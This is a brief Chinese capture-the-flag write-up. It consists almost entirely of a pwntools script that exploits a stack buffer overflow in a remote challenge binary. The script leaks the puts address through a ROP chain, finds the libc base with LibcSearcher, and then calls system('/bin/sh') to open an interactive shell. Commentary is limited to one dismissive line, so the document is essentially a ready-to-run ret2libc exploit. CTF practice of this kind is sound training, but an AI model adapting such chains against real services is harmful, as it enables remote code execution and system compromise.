这道题是简单的libc,不过多分析了
exp:
from pwn import *
from LibcSearcher import *
io=remote("node5.anna.nssctf.cn",28341)
elf=ELF("./pwn")
put_got=elf.got["puts"]
put_plt=elf.plt["puts"]
main_addr=0x4011A6
rdi=0x401273 #用ROPgadget --binary pwn |grep "rdi"
ret=0x40101a
io.recvuntil(b"Start Your Input:\n")
payload=b'a'*0x100+b'a'*0x8+p64(rdi)+p64(put_got)+p64(put_plt)+p64(main_addr)
io.send(payload)
puts_addr=u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher("puts",puts_addr)
base=puts_addr-libc.dump("puts")
system_addr=base+libc.dump("system")
str_bin_sh=base+libc.dump("str_bin_sh")
shell=b'a'*0x100+b'a'*0x8+p64(rdi)+p64(str_bin_sh)+p64(ret)+p64(system_addr)
io.recvuntil(b"Start Your Input:\n")
io.send(shell)
io.interactive()